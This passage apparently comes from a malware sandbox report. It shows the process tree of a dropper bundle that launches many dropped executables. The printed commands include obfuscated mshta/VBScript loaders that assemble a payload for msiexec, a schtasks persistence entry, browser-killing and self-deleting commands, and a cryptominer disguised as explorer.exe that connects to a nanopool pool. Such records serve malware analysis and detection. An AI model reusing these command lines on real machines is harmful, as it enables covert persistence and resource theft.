10⤵
PID:8260

C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1652,11789575647461292781,3196081949070900080,131072 --lang=de --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw10148_115526813" --mojo-platform-channel-handle=1684 /prefetch:8
9⤵
PID:8848

C:\Users\Admin\Pictures\Adobe Films\ZzOGYWn1W5sNfdN4RvEIv3to.exe
"C:\Users\Admin\Pictures\Adobe Films\ZzOGYWn1W5sNfdN4RvEIv3to.exe"
6⤵
PID:2288

C:\Users\Admin\AppData\Local\Temp\is-JMFNK.tmp\ZzOGYWn1W5sNfdN4RvEIv3to.tmp
"C:\Users\Admin\AppData\Local\Temp\is-JMFNK.tmp\ZzOGYWn1W5sNfdN4RvEIv3to.tmp" /SL5="$702BC,506127,422400,C:\Users\Admin\Pictures\Adobe Films\ZzOGYWn1W5sNfdN4RvEIv3to.exe"
7⤵
PID:4852

C:\Users\Admin\AppData\Local\Temp\is-9PBDK.tmp\DYbALA.exe
"C:\Users\Admin\AppData\Local\Temp\is-9PBDK.tmp\DYbALA.exe" /S /UID=2710
8⤵
PID:7380

C:\Program Files\Google\OHWHWFKZEO\foldershare.exe
"C:\Program Files\Google\OHWHWFKZEO\foldershare.exe" /VERYSILENT
9⤵
PID:7492

C:\Users\Admin\AppData\Local\Temp\b8-1bc1a-669-5f885-dda7a2e8ac185\Qyvybizhowa.exe
"C:\Users\Admin\AppData\Local\Temp\b8-1bc1a-669-5f885-dda7a2e8ac185\Qyvybizhowa.exe"
9⤵
PID:7456

C:\Users\Admin\AppData\Local\Temp\da-7ab5d-239-40fa3-ef4120c148858\Kifodaecony.exe
"C:\Users\Admin\AppData\Local\Temp\da-7ab5d-239-40fa3-ef4120c148858\Kifodaecony.exe"
9⤵
PID:4520

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\lyj3sl5g.m1j\GcleanerEU.exe /eufive & exit
10⤵
PID:9196

C:\Users\Admin\AppData\Local\Temp\lyj3sl5g.m1j\GcleanerEU.exe
C:\Users\Admin\AppData\Local\Temp\lyj3sl5g.m1j\GcleanerEU.exe /eufive
11⤵
PID:9980

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ibemyija.0si\installer.exe /qn CAMPAIGN="654" & exit
10⤵
PID:3444

C:\Users\Admin\AppData\Local\Temp\ibemyija.0si\installer.exe
C:\Users\Admin\AppData\Local\Temp\ibemyija.0si\installer.exe /qn CAMPAIGN="654"
11⤵
PID:10032

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ayc5urj5.mfx\any.exe & exit
10⤵
PID:9344

C:\Users\Admin\AppData\Local\Temp\ayc5urj5.mfx\any.exe
C:\Users\Admin\AppData\Local\Temp\ayc5urj5.mfx\any.exe
11⤵
PID:10156

C:\Users\Admin\AppData\Local\Temp\ayc5urj5.mfx\any.exe
"C:\Users\Admin\AppData\Local\Temp\ayc5urj5.mfx\any.exe" -u
12⤵
PID:9988

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\cax1rjz4.5sp\gcleaner.exe /mixfive & exit
10⤵
PID:9548

C:\Users\Admin\AppData\Local\Temp\cax1rjz4.5sp\gcleaner.exe
C:\Users\Admin\AppData\Local\Temp\cax1rjz4.5sp\gcleaner.exe /mixfive
11⤵
PID:300

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\wfv5ln4o.cbt\autosubplayer.exe /S & exit
10⤵
PID:9696

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed096a1bff61.exe
4⤵
PID:312

C:\Users\Admin\AppData\Local\Temp\7zS823188E5\Wed096a1bff61.exe
Wed096a1bff61.exe
5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2008

C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
6⤵
- Executes dropped EXE
PID:932

C:\Users\Admin\AppData\Local\Temp\BCleanSoft82.exe
"C:\Users\Admin\AppData\Local\Temp\BCleanSoft82.exe"
7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4180

C:\Users\Admin\AppData\Roaming\8696598.exe
"C:\Users\Admin\AppData\Roaming\8696598.exe"
8⤵
- Executes dropped EXE
PID:4252

C:\Users\Admin\AppData\Roaming\2088911.exe
"C:\Users\Admin\AppData\Roaming\2088911.exe"
8⤵
- Executes dropped EXE
PID:4464

C:\Users\Admin\AppData\Roaming\20751.exe
"C:\Users\Admin\AppData\Roaming\20751.exe"
8⤵
- Executes dropped EXE
PID:2896

C:\Users\Admin\AppData\Roaming\4657985.exe
"C:\Users\Admin\AppData\Roaming\4657985.exe"
8⤵
- Executes dropped EXE
PID:4528

C:\Users\Admin\AppData\Roaming\8149190.exe
"C:\Users\Admin\AppData\Roaming\8149190.exe"
8⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5644

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
9⤵
PID:6576

C:\Users\Admin\AppData\Roaming\7903763.exe
"C:\Users\Admin\AppData\Roaming\7903763.exe"
8⤵
- Executes dropped EXE
PID:5724

C:\Users\Admin\AppData\Roaming\7433237.exe
"C:\Users\Admin\AppData\Roaming\7433237.exe"
8⤵
- Executes dropped EXE
- Adds Run key to start application
PID:5680

C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
9⤵
- Suspicious behavior: SetClipboardViewer
PID:1488

C:\Users\Admin\AppData\Local\Temp\inst1.exe
"C:\Users\Admin\AppData\Local\Temp\inst1.exe"
7⤵
- Executes dropped EXE
PID:4300

C:\Users\Admin\AppData\Local\Temp\Soft1WW02.exe
"C:\Users\Admin\AppData\Local\Temp\Soft1WW02.exe"
7⤵
- Executes dropped EXE
PID:4448

C:\Users\Admin\AppData\Local\Temp\5.exe
"C:\Users\Admin\AppData\Local\Temp\5.exe"
7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4604

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 4604 -s 1568
8⤵
- Program crash
PID:6048

C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe
"C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"
7⤵
- Executes dropped EXE
PID:4752

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If """" == """" for %M in (""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )
8⤵
PID:1616

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""=="" for %M in ("C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ) do taskkill -f -iM "%~NxM"
9⤵
PID:1156

C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe
..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi
10⤵
- Executes dropped EXE
PID:5356

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in (""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )
11⤵
PID:5896

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If "/PLQtzfgO0m8dRv4iYALOqi "=="" for %M in ("C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"
12⤵
PID:5936

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbScRIpt:CLosE ( cReAteobjEcT("wscRiPt.SheLl" ). RUn ("C:\Windows\system32\cmd.exe /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo | Set /P = ""MZ"" > hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC " , 0, tRUE) )
11⤵
PID:6396

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo | Set /P = "MZ" >hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V +1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC& Del /q *&starT msiexec -Y ..\lXQ2g.WC
12⤵
PID:4556

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" EcHo "
13⤵
PID:7028

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>hKS2IU.1Q"
13⤵
PID:4308

C:\Windows\SysWOW64\msiexec.exe
msiexec -Y ..\lXQ2g.WC
13⤵
PID:2532

C:\Windows\SysWOW64\taskkill.exe
taskkill -f -iM "search_hyperfs_206.exe"
10⤵
- Kills process with taskkill
PID:1944

C:\Users\Admin\AppData\Local\Temp\setup.exe
"C:\Users\Admin\AppData\Local\Temp\setup.exe"
7⤵
- Executes dropped EXE
PID:4864

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4864 -s 800
8⤵
- Program crash
PID:6180

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4864 -s 784
8⤵
- Program crash
PID:6680

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4864 -s 924
8⤵
- Program crash
PID:6292

C:\Users\Admin\AppData\Local\Temp\4.exe
"C:\Users\Admin\AppData\Local\Temp\4.exe"
7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4508

C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
8⤵
- Executes dropped EXE
PID:3012

C:\Users\Admin\AppData\Local\Temp\wangting-game.exe
"C:\Users\Admin\AppData\Local\Temp\wangting-game.exe"
7⤵
- Executes dropped EXE
PID:4936

C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe
"C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"
7⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5032

C:\Users\Admin\AppData\Roaming\Calculator\setup.exe
C:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=1
8⤵
PID:5468

C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--iUSIg"
9⤵
PID:9460

C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x1ec,0x1f0,0x1f4,0x1c8,0x1f8,0x7fff042fdec0,0x7fff042fded0,0x7fff042fdee0
10⤵
PID:5512

C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff647209e70,0x7ff647209e80,0x7ff647209e90
11⤵
PID:6172

C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1824,572187607654083606,3589768340526864942,131072 --lang=de --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9460_744108199" --mojo-platform-channel-handle=1912 /prefetch:8
10⤵
PID:7152

C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1824,572187607654083606,3589768340526864942,131072 --lang=de --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9460_744108199" --mojo-platform-channel-handle=1900 /prefetch:8
10⤵
PID:812

C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1824,572187607654083606,3589768340526864942,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9460_744108199" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1840 /prefetch:2
10⤵
PID:8180

C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1824,572187607654083606,3589768340526864942,131072 --lang=de --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9460_744108199" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2528 /prefetch:1
10⤵
PID:8228

C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1824,572187607654083606,3589768340526864942,131072 --lang=de --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9460_744108199" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --mojo-platform-channel-handle=2548 /prefetch:1
10⤵
PID:8272

C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1824,572187607654083606,3589768340526864942,131072 --lang=de --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9460_744108199" --mojo-platform-channel-handle=3208 /prefetch:8
10⤵
PID:9028

C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1824,572187607654083606,3589768340526864942,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9460_744108199" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3284 /prefetch:2
10⤵
PID:6220

C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1824,572187607654083606,3589768340526864942,131072 --lang=de --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9460_744108199" --mojo-platform-channel-handle=3304 /prefetch:8
10⤵
PID:6688

C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1824,572187607654083606,3589768340526864942,131072 --lang=de --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9460_744108199" --mojo-platform-channel-handle=3436 /prefetch:8
10⤵
PID:9400

C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1824,572187607654083606,3589768340526864942,131072 --lang=de --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9460_744108199" --mojo-platform-channel-handle=2720 /prefetch:8
10⤵
PID:4872

C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1824,572187607654083606,3589768340526864942,131072 --lang=de --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9460_744108199" --mojo-platform-channel-handle=3444 /prefetch:8
10⤵
PID:8872

C:\Users\Admin\AppData\Local\Temp\10.exe
"C:\Users\Admin\AppData\Local\Temp\10.exe"
7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4248

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 4248 -s 1528
8⤵
- Program crash
PID:5404

C:\Users\Admin\AppData\Local\Temp\Chrome5.exe
"C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"
7⤵
- Executes dropped EXE
PID:4420

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"
8⤵
PID:5684

C:\Windows\System32\cmd.exe
"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"
9⤵
PID:8736

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"
10⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Creates scheduled task(s)
PID:6140

C:\Windows\System32\cmd.exe
"cmd" cmd /c "C:\Users\Admin\AppData\Roaming\services64.exe"
9⤵
PID:2308

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
10⤵
PID:6952

C:\Users\Admin\AppData\Roaming\services64.exe
C:\Users\Admin\AppData\Roaming\services64.exe
10⤵
PID:8632

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Roaming\services64.exe"
11⤵
PID:8732

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
12⤵
PID:6436

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "/sihost64"
13⤵
PID:8252

C:\Windows\explorer.exe
C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.udda/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6OAdluV/h8Wx+uVST9CwRTBBZDSizq+6yEkb73lzV2SG" --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=5 --cinit-idle-cpu=60 --tls --cinit-stealth
12⤵
PID:6236

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed0971f17486f8.exe
4⤵
- Suspicious use of WriteProcessMemory
PID:1724

C:\Users\Admin\AppData\Local\Temp\7zS823188E5\Wed0971f17486f8.exe
Wed0971f17486f8.exe
5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2308

C:\Users\Admin\AppData\Local\Temp\7zS823188E5\Wed0971f17486f8.exe
C:\Users\Admin\AppData\Local\Temp\7zS823188E5\Wed0971f17486f8.exe
6⤵
- Executes dropped EXE
PID:2208

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed09db0d52c38.exe
4⤵
PID:3172

C:\Users\Admin\AppData\Local\Temp\7zS823188E5\Wed09db0d52c38.exe
Wed09db0d52c38.exe
5⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
PID:3952

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
6⤵
PID:4380

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
7⤵
- Kills process with taskkill
PID:4388

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed09b3a5ca1a712d390.exe
4⤵
PID:600

C:\Users\Admin\AppData\Local\Temp\7zS823188E5\Wed09b3a5ca1a712d390.exe
Wed09b3a5ca1a712d390.exe
5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2164

C:\Users\Admin\AppData\Roaming\6619578.exe
"C:\Users\Admin\AppData\Roaming\6619578.exe"
6⤵
- Executes dropped EXE
PID:5756

C:\Users\Admin\AppData\Roaming\8188935.exe
"C:\Users\Admin\AppData\Roaming\8188935.exe"
6⤵
PID:5924

C:\Users\Admin\AppData\Roaming\8159250.exe
"C:\Users\Admin\AppData\Roaming\8159250.exe"
6⤵
PID:5956

C:\Users\Admin\AppData\Roaming\2471790.exe
"C:\Users\Admin\AppData\Roaming\2471790.exe"
6⤵
- Executes dropped EXE
PID:5600

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed0901eb1dae126e32.exe
4⤵
- Suspicious use of WriteProcessMemory
PID:1644

C:\Users\Admin\AppData\Local\Temp\7zS823188E5\Wed0901eb1dae126e32.exe
Wed0901eb1dae126e32.exe
5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1148

C:\Users\Admin\AppData\Local\Temp\7zS823188E5\Wed0901eb1dae126e32.exe
C:\Users\Admin\AppData\Local\Temp\7zS823188E5\Wed0901eb1dae126e32.exe
6⤵
- Executes dropped EXE
PID:1892

C:\Users\Admin\AppData\Local\Temp\7zS823188E5\Wed0901eb1dae126e32.exe
C:\Users\Admin\AppData\Local\Temp\7zS823188E5\Wed0901eb1dae126e32.exe
6⤵
- Executes dropped EXE
PID:2108

C:\Users\Admin\AppData\Local\Temp\7zS823188E5\Wed0901eb1dae126e32.exe
C:\Users\Admin\AppData\Local\Temp\7zS823188E5\Wed0901eb1dae126e32.exe
6⤵
- Executes dropped EXE
PID:4492

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed09cfb2f9758281d8.exe /mixone
4⤵
PID:920

C:\Users\Admin\AppData\Local\Temp\7zS823188E5\Wed09cfb2f9758281d8.exe
Wed09cfb2f9758281d8.exe /mixone
5⤵
- Executes dropped EXE
PID:3324

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3324 -s 660
6⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:4948

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3324 -s 676
6⤵
- Program crash
PID:5776

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3324 -s 684
6⤵
- Program crash
PID:6124

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3324 -s 700
6⤵
- Program crash
PID:6652

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3324 -s 932
6⤵
- Program crash
PID:4828

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3324 -s 1096
6⤵
- Program crash
PID:5504

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed09e95ff6b5.exe
4⤵
PID:1252

C:\Users\Admin\AppData\Local\Temp\7zS823188E5\Wed09e95ff6b5.exe
Wed09e95ff6b5.exe
5⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2840

C:\Users\Public\run.exe
C:\Users\Public\run.exe
6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2000

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
7⤵
PID:6196

C:\Users\Public\run2.exe
C:\Users\Public\run2.exe
6⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1656

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed09c42cad92c20f79.exe
4⤵
PID:1344

C:\Users\Admin\AppData\Local\Temp\7zS823188E5\Wed09c42cad92c20f79.exe
Wed09c42cad92c20f79.exe
5⤵
- Executes dropped EXE
PID:3736

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "Wed09c42cad92c20f79.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zS823188E5\Wed09c42cad92c20f79.exe" & exit
6⤵
PID:9308

C:\Windows\SysWOW64\taskkill.exe
taskkill /im "Wed09c42cad92c20f79.exe" /f
7⤵
- Kills process with taskkill
PID:9528

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed09abf83d9c2.exe
4⤵
PID:3256

C:\Windows\SysWOW64\cmd.exe
